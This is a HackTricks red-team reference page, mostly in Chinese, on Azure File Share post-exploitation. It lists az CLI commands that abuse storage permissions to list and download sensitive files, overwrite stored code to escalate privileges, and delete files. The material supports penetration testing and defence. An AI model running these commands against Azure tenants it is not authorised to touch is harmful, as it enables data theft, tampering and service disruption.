Az - File Share Post Exploitation

学习和实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习和实践 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 分享黑客技巧。

文件共享权限提升

有关文件共享的更多信息，请查看：

Microsoft.Storage/storageAccounts/fileServices/fileshares/files/read

具有此权限的主体将能够列出文件共享中的文件并下载可能包含敏感信息的文件。

# List files inside an azure file share
az storage file list \
--account-name <name> \
--share-name <share-name> \
--auth-mode login --enable-file-backup-request-intent

# Download an specific file
az storage file download \
--account-name <name> \
--share-name <share-name> \
--path <filename-to-download> \
--dest /path/to/down \
--auth-mode login --enable-file-backup-request-intent

Microsoft.Storage/storageAccounts/fileServices/fileshares/files/write, Microsoft.Storage/storageAccounts/fileServices/writeFileBackupSemantics/action

拥有此权限的主体将能够在文件共享中写入和覆盖文件，这可能使他造成一些损害甚至提升权限（例如，覆盖存储在文件共享中的某些代码）：

az storage blob upload \
--account-name <acc-name> \
--container-name <container-name> \
--file /tmp/up.txt --auth-mode login --overwrite

*/delete

这将允许删除共享文件系统中的文件，这可能会中断某些服务或使客户端丢失有价值的信息。

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAz - Key Vault Post Exploitation NextAz - Table Storage Post Exploitation

Last updated 10 hours ago